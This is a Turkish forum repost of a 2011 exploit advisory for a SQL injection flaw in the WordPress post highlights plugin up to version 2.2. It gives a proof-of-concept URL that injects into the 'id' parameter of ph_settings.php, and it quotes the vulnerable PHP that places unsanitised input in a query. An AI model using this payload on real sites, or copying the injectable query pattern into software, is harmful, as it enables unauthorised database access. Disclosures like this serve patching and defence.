WordPress post highlights plugin <= 2.2 SQL Injection Vulnerability

!nFiNiTe · 7 Eyl 2011

[FONT=Times New Roman, Times, serif]WordPress post highlights plugin <= 2.2 SQL Injection Vulnerability[/FONT]

Kod:

[COLOR=#000000][COLOR=#FF8000]# Exploit Title: WordPress post highlights plugin <= 2.2 SQL Injection Vulnerability 
# Date: 2011-09-06 
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) 
# Software Link: http://downloads.wordpress.org/plugin/post-highlights.2.2.zip 
# Version: 2.2 (tested) 
# Note: magic_quotes has to be turned off 
  
[/COLOR][COLOR=#007700]--- 
[/COLOR][COLOR=#0000BB]PoC 
[/COLOR][COLOR=#007700]--- 
[/COLOR][COLOR=#0000BB]http[/COLOR][COLOR=#007700]:[/COLOR][COLOR=#FF8000]//www.site.com/wp-content/plugins/post-highlights/ajax/ph_settings.php?id=-1' OR 1=1--%20 
  
[/COLOR][COLOR=#007700]--------------- 
[/COLOR][COLOR=#0000BB]Vulnerable code 
[/COLOR][COLOR=#007700]--------------- 
[/COLOR][COLOR=#0000BB]$id [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$_GET[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]"id"[/COLOR][COLOR=#007700]]; 
... 
[/COLOR][COLOR=#0000BB]$query [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#DD0000]"SELECT guid, ID FROM $wpdb->posts WHERE post_type='attachment' AND post_parent='$id'"[/COLOR][COLOR=#007700]; [/COLOR][/COLOR]

WordPress post highlights plugin <= 2.2 SQL Injection Vulnerability

!nFiNiTe

Kadim Üye

Sosyal medya sayfalarımız